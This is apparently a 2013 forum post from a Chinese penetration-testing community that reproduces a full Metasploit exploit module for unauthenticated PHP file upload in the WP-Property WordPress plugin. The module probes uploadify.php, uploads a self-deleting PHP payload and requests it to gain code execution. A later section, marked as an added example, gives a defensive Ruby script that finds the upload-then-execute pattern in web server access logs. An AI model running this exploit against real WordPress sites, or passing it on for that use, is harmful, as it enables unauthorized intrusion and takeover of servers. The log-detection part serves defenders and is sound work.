中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
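
For defenders, an added example (not part of the original post or of Metasploit): the module requests a self-deleting stub (:unlink_self=>true), so a sweep of the uploadify directory can come up empty and the web server access log is the durable evidence. The script below assumes Combined Log Format; the function names, sample addresses and sample file name are constructed for illustration.

```ruby
# Added example, not from the original post: find the upload-then-request
# sequence against WP-Property's uploadify.php in web server access logs.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze
# Combined Log Format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Constructed sample lines (documentation-range addresses, made-up file name).
SAMPLE_LOG = [
  '198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"',
  '203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 78 "-" "-"',
  '203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWxyZ.php HTTP/1.1" 200 0 "-" "-"',
  '198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"'
].freeze

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[1], time: m[2], method: m[3],
    path: m[4].split('?').first.to_s, status: m[5].to_i }
end

# One finding per successful POST to uploadify.php; each finding collects later
# requests from the same client for any other .php file in that directory.
# Assumption: the upload lands in the uploadify directory, as in the module.
def find_upload_exec(lines)
  last_upload = {} # client ip => most recent finding
  findings = []
  lines.each do |line|
    e = parse_line(line) or next
    idx = e[:path].index(UPLOADIFY_DIR) or next
    rest = e[:path][(idx + UPLOADIFY_DIR.length)..-1]
    if e[:method] == 'POST' && rest == 'uploadify.php' && e[:status] == 200
      last_upload[e[:ip]] = { ip: e[:ip], upload_time: e[:time], requested: [] }
      findings << last_upload[e[:ip]]
    elsif last_upload[e[:ip]] && rest =~ /\.php\z/i && rest != 'uploadify.php'
      last_upload[e[:ip]][:requested] << { path: e[:path], status: e[:status] }
    end
  end
  findings
end

find_upload_exec(SAMPLE_LOG).each do |f|
  puts "#{f[:ip]} uploaded at #{f[:upload_time]}; then requested: " \
       "#{f[:requested].map { |r| r[:path] }.join(', ')}"
end
```

A finding with an empty requested list still records a successful unauthenticated POST to uploadify.php and is worth reviewing on its own.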